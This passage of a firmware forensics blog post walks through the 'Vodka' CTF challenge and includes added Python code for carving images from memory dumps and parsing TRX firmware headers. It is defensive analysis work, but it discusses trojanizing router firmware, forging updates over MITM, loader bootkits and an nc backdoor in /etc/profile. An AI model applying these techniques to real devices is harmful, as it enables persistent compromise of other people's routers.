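Added example, not code from the original post or from GIMP/Tile Molester.
The dump is read as rows of `width` 32-bit BGRX pixels (format assumed);
runs of rows that are nearly identical to the row above them are what window
backgrounds and the taskbar look like once the guessed width is right.
"""
import random
import struct
from typing import Dict, List, Tuple

BPP = 4                                   # bytes per pixel, 32-bit BGRX (assumed)
COMMON_WIDTHS = (1024, 1280, 1366, 1440, 1600, 1920)


def row_similarity(a: bytes, b: bytes) -> float:
    """Fraction of pixel positions holding the same 32-bit value in two rows."""
    pa, pb = memoryview(a).cast("I"), memoryview(b).cast("I")
    return sum(x == y for x, y in zip(pa, pb)) / len(pa)


def find_candidate_regions(data: bytes, width: int, min_rows: int = 16,
                           threshold: float = 0.9) -> List[Tuple[int, int]]:
    """(offset, rows) of every run of at least `min_rows` consecutive rows in
    which each row matches the previous one at `threshold` or better."""
    stride = width * BPP
    regions, prev, start, count = [], None, None, 0
    for off in range(0, len(data) - stride + 1, stride):
        row = data[off:off + stride]
        if prev is not None and row_similarity(prev, row) >= threshold:
            if start is None:
                start, count = off - stride, 1      # the previous row opens the run
            count += 1
        else:
            if start is not None and count >= min_rows:
                regions.append((start, count))
            start, count = None, 0
        prev = row
    if start is not None and count >= min_rows:
        regions.append((start, count))
    return regions


def scan_common_widths(data: bytes) -> Dict[int, List[Tuple[int, int]]]:
    """Try the usual desktop widths; the right one is where the long runs appear."""
    return {w: find_candidate_regions(data, w) for w in COMMON_WIDTHS}


def carve_bmp(data: bytes, offset: int, width: int, rows: int) -> bytes:
    """Wrap `rows` framebuffer rows into a 32-bpp BMP. BMP stores scanlines
    bottom-up, which is why a BMP sitting in memory shows up upside down when
    the dump is viewed top-down; rows are written in reverse so the carved
    file displays the right way up."""
    stride = width * BPP
    pixels = b"".join(data[offset + r * stride:offset + (r + 1) * stride]
                      for r in reversed(range(rows)))
    file_header = struct.pack("<2sIHHI", b"BM", 14 + 40 + len(pixels), 0, 0, 54)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, rows, 1, 32, 0,
                              len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels


def bmp_dimensions(bmp: bytes) -> Tuple[int, int]:
    """(width, height) from the BITMAPINFOHEADER of a carved file."""
    return struct.unpack_from("<ii", bmp, 18)


def build_synthetic_dump(width: int = 1440, seed: int = 7) -> Tuple[bytes, int]:
    """Constructed input: 40 rows of noise, a 64-row 'window' whose rows share a
    horizontal gradient (so a wrong width breaks the row alignment) plus a
    diagonal of bright pixels, then 40 more rows of noise. Returns the dump and
    the window's offset."""
    rnd = random.Random(seed)
    stride = width * BPP
    noise = rnd.getrandbits(8 * stride * 40).to_bytes(stride * 40, "little")
    rows = []
    for r in range(64):
        row = bytearray()
        for x in range(width):
            row += bytes([x % 256, 0xF0, 0xF0, 0])   # B channel carries the gradient
        row[r * BPP] = 0xFF                          # one 'cursor' pixel per row
        rows.append(bytes(row))
    window = b"".join(rows)
    return noise + window + noise, len(noise)


if __name__ == "__main__":
    dump, expected = build_synthetic_dump()
    for w, hits in scan_common_widths(dump).items():
        print(f"width {w}: {hits}")
    for off, rows in find_candidate_regions(dump, 1440):
        with open(f"carved_{off:#x}.bmp", "wb") as f:
            f.write(carve_bmp(dump, off, 1440, rows))
```

Run it against a real dump by replacing build_synthetic_dump() with the file contents; on a uniform-coloured background the row-similarity test also fires at the wrong width, so the gradient in the constructed data is deliberately harder than a real desktop, and the width that yields the longest runs is the one to keep.<br /><br />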
Binwalk, for example, can find <a href="https://github.com/devttys0/binwalk/blob/b131b7cda7d067897901a5a29dc0cdb8ca69efcb/src/binwalk/modules/compression.py">raw deflate/lzma</a> streams by building headers on top of the raw compressed data and writing it back to disk.<br /><br />I'm no Computer Vision expert, but here are a few suggestions:<br /><br /><ul><li>Set the image width to common display resolutions. The taskbar from the coor coor memory dump could be displayed by setting the width to 1440 pixels (1440x900 is a common screen resolution).</li><li>Use common window backgrounds/patterns as a template to find interesting sections.</li><li>Create a multi-view/side-by-side RAW image browser based on the <a href="https://github.com/GNOME/gimp/blob/cd99314572504bcbcbc9b82035e45fcd95d7d9d5/plug-ins/common/file-raw-data.c">GIMP source code</a> (multiple image types, multiple widths etc).</li><li>Use Google's artificial intelligence to <a href="http://www.wired.com/2012/06/google-x-neural-network/">find cat videos</a>.</li><li>Get a bigger monitor (yeah, it helps).</li></ul><br />I hope you all use these skills wisely, avoiding any kind of superfishal investigation like our Lenovo friends.<br /><br /><a href="https://imgur.com/V4zfOZX"><img height="400" src="https://i.imgur.com/V4zfOZX.png" width="640" /></a><br /><br /><br />Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br /><br /><b>Firmware Forensics: Diffs, Timelines, ELFs and Backdoors</b><br />Published 2015-02-09T11:49:00.000-02:00, updated 2015-05-04T23:57:38.187-03:00<br /><br />This post covers some common techniques that I use to analyze and reverse firmware images.
These techniques are particularly useful to dissect malicious firmwares, spot backdoors and detect unwanted modifications.<br /><br />Backdooring and re-flashing firmware images is becoming mainstream: malicious guys are infecting embedded devices and inserting trojans in order to achieve persistence. Recent articles covered the increasing number of <a href="http://www.net-security.org/malware_news.php?id=2917">trojanized android firmwares</a> and <a href="http://securelist.com/blog/research/67794/state-of-play-network-devices-facing-bulls-eye/">routers that are being permanently modified</a>.<br /><br />Attackers with a privileged network position may MITM your requests and forge fake updates containing malicious firmwares. Writing <a href="https://github.com/infobyte/evilgrade">Evilgrade</a> modules for this is really simple, as most vendors keep <a href="http://dnlongen.blogspot.com.br/2014/10/CVE-2014-2718-Asus-RT-MITM.html">failing to deliver updates securely</a>, right <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">ASUS</a>?<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-B6H16E5rNDw/VHf3xxFR1KI/AAAAAAAAAu4/cOoYDoKFivs/s1600/22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="310" src="http://2.bp.blogspot.com/-B6H16E5rNDw/VHf3xxFR1KI/AAAAAAAAAu4/cOoYDoKFivs/s1600/22.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">All your HTTP packets are belong to us...</td></tr></tbody></table>Older versions of ASUS firmwares were vulnerable to MITM attacks (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2718">CVE-2014-2718</a>) because they fetched updates over plain HTTP and performed no signature check on the downloaded image.
ASUS silently patched the issue on 3.0.0.4.376+ and they're now <a href="https://github.com/RMerl/asuswrt-merlin/blob/042f83715c5951e291a83ce7d967c3372a392a26/release/src/router/rom/webs_scripts/nozip_webs_upgrade.sh#L75-L96">verifying RSA signatures</a> via /sbin/rsasign_check:<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-ZdhOjK1rjLA/VNhSX8WfJ2I/AAAAAAAAA5g/MDmqKOhO9SU/s1600/asus_rsa.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="http://1.bp.blogspot.com/-ZdhOjK1rjLA/VNhSX8WfJ2I/AAAAAAAAA5g/MDmqKOhO9SU/s1600/asus_rsa.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Valid signature -&gt; nvram_set("rsasign_check", "1")</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"></div><br /><b>NoConName 2014 CTF Finals: Vodka</b><br /><br />I'll keep my <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">tradition</a> of writing posts based on CTF challenges because <strike>everybody upvotes CTF posts on reddit</strike> it's cool.<br /><br />The challenge "<a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">Vodka</a>", from the <a href="https://twitter.com/noconname">NoConName 2014</a> CTF Finals, was created by <a href="https://twitter.com/MarioVilas">@MarioVilas</a>, who kindly provided the files <a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">here</a> (thanks dude!).<br /><br />I did not participate in the CTF finals, but I found the challenge really interesting because there were many
different ways to solve it, summarizing the actions needed to inspect a compromised firmware. In my opinion, the best CTF challenges are the ones that require us to <a href="https://github.com/ctfs/write-ups/tree/master/hack-lu-ctf-2014/hotcows-dating">develop/use new techniques</a> and <a href="https://twitter.com/cherepanov74/status/525617612559249408">improve existing tools</a>.<br /><br />NoConName 2014 Finals: Vodka<br />Challenge Category: Forensics<br />Description: No hints :( just get the flag. <br /><br />This challenge description is not very intriguing, so I hired a couple of marketing specialists to <strike>design a new logo</strike> add some Infosec drama and reformulate it:<br /><br /><div class="code">A mysterious bug affected one of the core routers at a major Internet service provider in Syria. The failure of this router caused the whole country to suddenly lose all connection to the Internet. The Syrian government recorded a traffic capture right before the crash and hired you to perform a forensic analysis.</div><br />Download provided: <a href="https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka">https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka</a><br /><br /><br /><b>Network Forensics</b><br /><br />The download provided is a packet capture in the PCAP-NG format.
Wireshark is too mainstream, so let's <a href="http://pcapng.com/">convert the PCAP-NG to PCAP</a> and open it using <a href="http://www.netresec.com/?page=Networkminer">Network Miner</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-s9TwxKwnI7c/VGLg9RTvq2I/AAAAAAAAAr4/-yMBtpyje4c/s1600/tftp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="http://4.bp.blogspot.com/-s9TwxKwnI7c/VGLg9RTvq2I/AAAAAAAAAr4/-yMBtpyje4c/s320/tftp1.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eC8fEs6cGjI/VGLhAV4-00I/AAAAAAAAAsA/cyBLFdEMImA/s1600/tftp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="http://1.bp.blogspot.com/-eC8fEs6cGjI/VGLhAV4-00I/AAAAAAAAAsA/cyBLFdEMImA/s640/tftp2.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Network Miner makes it very easy for us to understand what's going on: there's some sort of file transfer via TFTP and the filename seems to be related to an OpenWRT firmware image.<br /><br /><br /><b>Firmware structure</b><br /><br />We always <a href="https://twitter.com/bernardomr/status/530532003498971136">binwalk all the things</a> but very few people stop to analyze and understand the firmware structure properly.
We know that the firmware image was downloaded using TFTP, a common way used by many routers to transfer config files/updates, and it is probably based on the <a href="https://www.openwrt.org/">OpenWRT project</a>.<br /><br />So what does binwalk tell us?<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-T5rzISWOw30/VM0xGWvnbcI/AAAAAAAAAyc/40srgJC5ypg/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://2.bp.blogspot.com/-T5rzISWOw30/VM0xGWvnbcI/AAAAAAAAAyc/40srgJC5ypg/s1600/Screenshot-Terminal.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yXmAB2_TuDI/VNF-qDhKAUI/AAAAAAAAA0U/ZaALwUJ4HjU/s1600/firm.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="http://1.bp.blogspot.com/-yXmAB2_TuDI/VNF-qDhKAUI/AAAAAAAAA0U/ZaALwUJ4HjU/s1600/firm.PNG" width="640" /></a></div><br />The <a href="http://wiki.openwrt.org/doc/techref/bootloader/cfe">Common Firmware Environment</a> (CFE) is a firmware interface/bootloader present on Broadcom SoCs. It is analogous to the BIOS on PC platforms and it is responsible for CPU initialization and bootstrap code on embedded processors. The CFE partition is also referred to as PMON and it is often mapped to <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">mtd0</a>.<br /><br />The JFFS2/NVRAM partitions are the non-volatile storage: they hold all the configuration parameters, including router settings, passwords and logs.<br /><br />Bear in mind that firmware updates often do not include the CFE/NVRAM partitions.
You can access the CFE console over serial, and you can also dump them on a live system using dd or via <a href="http://goodfet.sourceforge.net/apps/spi/">SPI</a>. Let's focus on the firmware sections included in the provided image (openwrt-wrtsl54gs-squashfs.bin):<br /><br /><b>TRX (Offset 0x20)</b><br /><br />The TRX header is just an encapsulation, describing a series of information about the firmware, including the image size, CRC, flags, version information and partition offsets. Binwalk wasn't recognizing the header and the relative offsets properly so I submitted <a href="https://github.com/devttys0/binwalk/pull/106">these</a> <a href="https://github.com/devttys0/binwalk/pull/107">two</a> pull requests. Creating <a href="https://github.com/devttys0/binwalk/wiki/Creating-Custom-Signatures">custom signatures</a> for binwalk is pretty straightforward.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-4dCX8ezR0h4/VNQyv491cWI/AAAAAAAAA24/58JmMSdmCDQ/s1600/Screenshot-Terminal-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://4.bp.blogspot.com/-4dCX8ezR0h4/VNQyv491cWI/AAAAAAAAA24/58JmMSdmCDQ/s1600/Screenshot-Terminal-00.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Some firmwares (like the newer ones from ASUS and Netgear) use this TRX structure but don't include a loader: the Linux Kernel and the RootFS offsets shift accordingly in that case.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4kLOoPuD7b0/VNYad2p4gdI/AAAAAAAAA3U/0GbiVVfaBcQ/s1600/trx-loader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://1.bp.blogspot.com/-4kLOoPuD7b0/VNYad2p4gdI/AAAAAAAAA3U/0GbiVVfaBcQ/s1600/trx-loader.png" 
width="400" /></a></div><br />If the firmware includes any extra header before the TRX, you have to add its size to the partition offsets displayed in the TRX header in order to find the real file offsets. Some firmwares for SOHO modems out there won't include it, so the displayed values are right in most cases. The downloaded OpenWRT image had the following offsets:<br /><br /><ul><li>Loader: 0x20 + 0x1C = 0x3C</li><li>Kernel: 0x20 + 0x8D8 = 0x8F8</li><li>RootFS: 0x20 + 0x7E400 = 0x7E420</li></ul><br />In this specific case, we have a <a href="http://wiki.openwrt.org/doc/techref/header">BinHeader</a> right before the TRX, carrying the board ID, the firmware date/version and the hardware version. The struct is described in <a href="https://github.com/mirror/dd-wrt/blob/master/src/include.v24/cyutils.h">cyutils.h</a>:<br /><br /><script src="https://gist.github.com/bmaia/3feab2fe6234a1e59deb.js"></script>This extra header appears on a few routers like the WRT54G series: the Web GUI checks for this pattern before actually writing the firmware.<br /><br /><a href="http://4.bp.blogspot.com/-rnZD1G-hN1w/VNA4H88OxiI/AAAAAAAAAzE/vCUP8HeyjEc/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="146" src="http://4.bp.blogspot.com/-rnZD1G-hN1w/VNA4H88OxiI/AAAAAAAAAzE/vCUP8HeyjEc/s1600/hex.PNG" width="640" /></a><br /><br />We are particularly interested in the fwdate field (Firmware Date), composed of the hex values 07 02 03. According to <a href="https://dev.openwrt.org/browser/trunk/tools/firmware-utils/src/addpattern.c">addpattern.c</a>, the first byte defines the year, the second one is the month and the third byte refers to the day the firmware was created.
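<br /><br />Putting the two headers together, here is an added example (not code from the post, from binwalk or from OpenWrt) that decodes the BinHeader, locates the TRX magic and turns the relative partition offsets into absolute ones, checking the TRX CRC on the way. Struct layouts follow cyutils.h and OpenWrt's trx.c; two details are assumptions you should check against those sources: the fwdate year byte is read as 2000 + byte, and the CRC is taken to be CRC-32 with initial value 0xFFFFFFFF and no final inversion, covering flag_version through the end of the image. The sample image is constructed for the example, with a loader sized so the kernel lands at the relative offset 0x8D8 seen above.<br /><br />

```python
"""Decode the BinHeader + TRX layout of an OpenWrt WRT54G-class image.

Added example; not code from the original post, binwalk or OpenWrt.
Structures follow cyutils.h (struct code_header, 0x20 bytes) and OpenWrt's
trx.c (struct trx_header, 0x1C bytes). Assumed: fwdate year = 2000 + byte,
and the TRX CRC is CRC-32 (init 0xFFFFFFFF, no final XOR) over
flag_version..end. TRX offsets are relative to the TRX magic, so whatever
precedes it (here the 0x20-byte BinHeader) is added to get file offsets.
"""
import struct
import zlib
from typing import Dict, List, Optional

BINHEADER_FMT = "<4s4s3s3s4sBB2s2s2s2s2s2s"   # struct code_header from cyutils.h
BINHEADER_LEN = struct.calcsize(BINHEADER_FMT)  # 0x20
TRX_MAGIC = b"HDR0"
TRX_FMT = "<4sIIIIII"                            # magic, len, crc32, flag_version, offsets[3]
TRX_LEN = struct.calcsize(TRX_FMT)               # 0x1C


def parse_binheader(blob: bytes) -> Dict[str, object]:
    """Vendor header the WRT54G web GUI checks before writing flash."""
    (magic, _res1, fwdate, fwvern, dev_id, hw_ver, serial,
     *_flag_fields) = struct.unpack_from(BINHEADER_FMT, blob, 0)
    year, month, day = fwdate                    # one byte each, per addpattern.c
    return {
        "magic": magic,
        "fwdate": f"{2000 + year:04d}-{month:02d}-{day:02d}",   # 2000 base assumed
        "fwvern": ".".join(str(b) for b in fwvern),
        "id": dev_id,
        "hw_ver": hw_ver,
        "sn": serial,
    }


def trx_crc32(payload: bytes) -> int:
    """CRC as trx.c's crc32buf computes it (assumed: no final inversion)."""
    return zlib.crc32(payload) ^ 0xFFFFFFFF


def find_trx(blob: bytes) -> Optional[int]:
    """File offset of the first TRX magic; partition offsets are relative to it."""
    pos = blob.find(TRX_MAGIC)
    return None if pos < 0 else pos


def parse_trx(blob: bytes, base: int) -> Dict[str, object]:
    """Header fields plus partition offsets, both relative and absolute."""
    magic, length, crc, flag_version, *offsets = struct.unpack_from(TRX_FMT, blob, base)
    if magic != TRX_MAGIC:
        raise ValueError(f"no TRX magic at {base:#x}")
    covered = blob[base + 12:base + length]      # crc32 covers flag_version..end
    used = [o for o in offsets if o]             # unused partition slots are zero
    return {
        "base": base,
        "len": length,
        "flags": flag_version & 0xFFFF,
        "version": flag_version >> 16,
        "rel_offsets": used,
        "abs_offsets": [base + o for o in used],
        "crc_ok": trx_crc32(covered) == crc,
    }


def build_trx(partitions: List[bytes], version: int = 1) -> bytes:
    """Assemble header + partitions the way the trx tool lays them out."""
    offsets, body = [], b""
    for part in partitions:
        offsets.append(TRX_LEN + len(body))
        body += part
    offsets += [0] * (3 - len(offsets))
    covered = struct.pack("<IIII", version << 16, *offsets) + body
    return struct.pack("<4sII", TRX_MAGIC, TRX_LEN + len(body), trx_crc32(covered)) + covered


def build_sample_image() -> bytes:
    """Constructed stand-in for openwrt-wrtsl54gs-squashfs.bin: a BinHeader with
    fwdate 07 02 03 (magic/id values chosen for the example), then a TRX whose
    loader is sized so the kernel sits at relative 0x8D8 (absolute 0x8F8).
    Partition bodies are dummies carrying only their leading magic."""
    binheader = struct.pack(BINHEADER_FMT, b"W54U", b"\0" * 4, bytes([7, 2, 3]),
                            bytes([0, 9, 0]), b"U2ND", 1, 0, *([b"\0\0"] * 6))
    loader = b"\x1f\x8b" + b"\0" * (0x8D8 - TRX_LEN - 2)     # gzip magic + padding
    kernel = b"\x5d\0\0\x80\0" + b"\0" * 0xFFB                # LZMA props + dict size + padding
    rootfs = b"hsqs" + b"\0" * 0x3FC                          # SquashFS magic + padding
    return binheader + build_trx([loader, kernel, rootfs])


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    print(parse_binheader(image))
    trx_base = find_trx(image)
    print(parse_trx(image, trx_base) if trx_base is not None else "no TRX header found")
```

Pass a real image as the first argument to decode it; a crc_ok of False on a vendor image means either the file was modified after the header was computed or the CRC convention assumed above does not match that vendor's tool, so confirm against trx.c before drawing conclusions.<br /><br />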
The fwdate seems to be 03-February-2007; save that for later, we will need it =)<br /><br /><b>GZ'd LZMA Loader (Offset 0x3C)</b><br /><br />According to the <a href="http://wiki.openwrt.org/doc/techref/flash.layout">OpenWRT Wiki</a>, the boot loader has no concept of filesystems: it assumes that the start of the TRX data section is executable code.<br /><br />The boot loader boots into an LZMA program which decompresses the kernel into RAM and executes it. It turns out the boot loader does know gzip compression, so we have a gzip-compressed LZMA decompression program at 0x3C.<br /><br />You can find the source code for this <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src?rev=11275">lzma-loader here</a> and <a href="https://downloads.openwrt.org/sources/loader-0.04.tar.gz">here</a>. Note the <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src/Makefile?rev=11275">TEXT_START offset</a> at 0x80001000: we may need to adjust the loading address in our disassembler in order to reverse the compiled loader. Don't forget to decompress it (gunzip) before reversing the file.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9BjGeqpZu04/VNBAI_w5iRI/AAAAAAAAAzU/7yVrEyWn2mY/s1600/offset.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-9BjGeqpZu04/VNBAI_w5iRI/AAAAAAAAAzU/7yVrEyWn2mY/s1600/offset.PNG" width="155" /></a><a href="http://2.bp.blogspot.com/-H9JC5JnXwaA/VNBEoJGiUTI/AAAAAAAAAzg/Rd7OebY2nyA/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://2.bp.blogspot.com/-H9JC5JnXwaA/VNBEoJGiUTI/AAAAAAAAAzg/Rd7OebY2nyA/s1600/1.PNG" width="400" /></a></div><br />Most embedded toolchains strip the binaries in order to reduce the firmware size.
If you want to reverse a friendlier version of the loader, grab the latest <a href="https://downloads.openwrt.org/barrier_breaker/14.07/brcm47xx/generic/OpenWrt-ImageBuilder-brcm47xx_generic-for-linux-x86_64.tar.bz2">OpenWRT ImageBuilder</a> and search for loader.elf:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-MIsP3HMUqQY/VNBIEHainKI/AAAAAAAAAz0/Gv9fODp_9E4/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://3.bp.blogspot.com/-MIsP3HMUqQY/VNBIEHainKI/AAAAAAAAAz0/Gv9fODp_9E4/s1600/Screenshot-Terminal-4.png" width="400" /></a></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-l69EaHyuXkY/VNBEoEOM1YI/AAAAAAAAAzk/F_u1MPHcIlQ/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="257" src="http://1.bp.blogspot.com/-l69EaHyuXkY/VNBEoEOM1YI/AAAAAAAAAzk/F_u1MPHcIlQ/s1600/2.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Woohoo, blue code =)</td></tr></tbody></table><br />Note that if we modify the loader to include a backdoor, we would have our very own Router <a href="https://en.wikipedia.org/wiki/Rootkit#Bootkits">Bootkit</a>, cool isn't it?<br /><br /><b>LZMA'd Kernel (Offset 0x8F8)</b><br /><br />Instead of just putting a kernel directly onto flash, most embedded devices compress the kernel using LZMA. The boot loader boots into an LZMA program which decompresses the kernel into RAM and executes it.<br /><br />Binwalk has a <a href="https://github.com/devttys0/binwalk/blob/5404839534c9ea6000f85d13664d84a19418fa11/src/binwalk/magic/linux">signature</a> to find Kernel version strings in raw Linux Kernels.
The identified string lists the toolchain used to compile the Kernel, as well as the compile date and version information:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RkIAutGouFg/VNFXOvHGh4I/AAAAAAAAA0E/ymh47GhKJog/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="http://1.bp.blogspot.com/-RkIAutGouFg/VNFXOvHGh4I/AAAAAAAAA0E/ymh47GhKJog/s1600/Screenshot-Terminal-5.png" width="400" /></a></div><br />And why did binwalk manage to find all this information in the Kernel? The answer can be found in the <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/toolchain/gcc/Makefile#L82">toolchain's Makefile</a>:<br /><br /><script src="https://gist.github.com/bmaia/154fb3df62ebd1947a9b.js"></script>If we follow the steps from my <a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">previous post</a> we can build a customized Kernel for OpenWRT. The generated <a href="https://en.wikipedia.org/wiki/Vmlinux">vmlinux</a> is often an ELF file, but in our case the object was <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/target/linux/linux-2.4/Makefile#L349">stripped using objcopy</a>:<br /><br /><script src="https://gist.github.com/bmaia/3dd9d0579bf9b967e3a8.js"></script> Did you notice the compile date was 03-February-2007? Let's save that for later as well.<br /><br /><b>SquashFS (Offset 0x72420)</b><br /><br />The last part is the actual filesystem. Most embedded Linux devices use SquashFS and many vendors hack it in order to get better compression and faster performance.
Hopefully we don't have to worry about that as <a href="http://www.devttys0.com/2014/08/mucking-about-with-squashfs/">Sasquatch</a> handles the different SquashFS header/compression formats.<br /><br />The filesystem has the standard OpenWRT directories and files, including a banner from the 0.9 build (White Russian).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--JqQ_XocJEE/VNGDirAqYJI/AAAAAAAAA0s/nh38Ixl9YlM/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="http://4.bp.blogspot.com/--JqQ_XocJEE/VNGDirAqYJI/AAAAAAAAA0s/nh38Ixl9YlM/s1600/Screenshot-Terminal-7.png" width="400" /></a></div><br />Both binwalk and sasquatch display the SquashFS superblock information, including the creation/last append time:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gTdsk89oeb0/VNGBRTVQC1I/AAAAAAAAA0g/MpE_LLgK06s/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-gTdsk89oeb0/VNGBRTVQC1I/AAAAAAAAA0g/MpE_LLgK06s/s1600/Screenshot-Terminal-6.png" width="400" /></a></div><br />Did you spot the date 29-October-2014?
There's definitely something going on here =)<br /><br /><b style="text-align: center;"><br /></b><b style="text-align: center;">Directory Tree Diff &amp; Fuzzy Hashing</b><br /><br />Now that we have unpacked &amp; unsquashed the firmware, let's use <a href="https://github.com/bmaia/binwally">binwally</a> to compare the directory trees and find the needle in the haystack.<br /><br />After googling the filename (openwrt-wrtsl54gs-squashfs.bin), we get three possible candidates:<br /><br />- <a href="https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin</a><br />- <a href="https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin</a><br />- <a href="https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin</a><br /><br />OpenWRT offers different builds for the same device because of constraints like limited flash size.
Let's download these three candidates, unpack and compare them:<br /><br /><div class="code">binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LizrFkRxHAU/VNGOeeAiEvI/AAAAAAAAA08/MdElWp9w60Y/s1600/binwally.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://2.bp.blogspot.com/-LizrFkRxHAU/VNGOeeAiEvI/AAAAAAAAA08/MdElWp9w60Y/s1600/binwally.png" width="400" /></a></div><br />The "micro" build has the highest overall match score (99%), so let's spot the differences:<br /><br /><div class="code">binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/ | grep -E -v "ignored|matches"</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kKKDQMQ45kY/VNGO5yMW6jI/AAAAAAAAA1E/xx7ryC0jQU4/s1600/binwally2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="http://3.bp.blogspot.com/-kKKDQMQ45kY/VNGO5yMW6jI/AAAAAAAAA1E/xx7ryC0jQU4/s1600/binwally2.png" width="400" /></a></div><br />After carefully reviewing these files, we notice that "/etc/profile" was modified to include a call to the nc backdoor.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cUbwigQTadU/VNGae467RBI/AAAAAAAAA10/jotqrVy69n8/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" 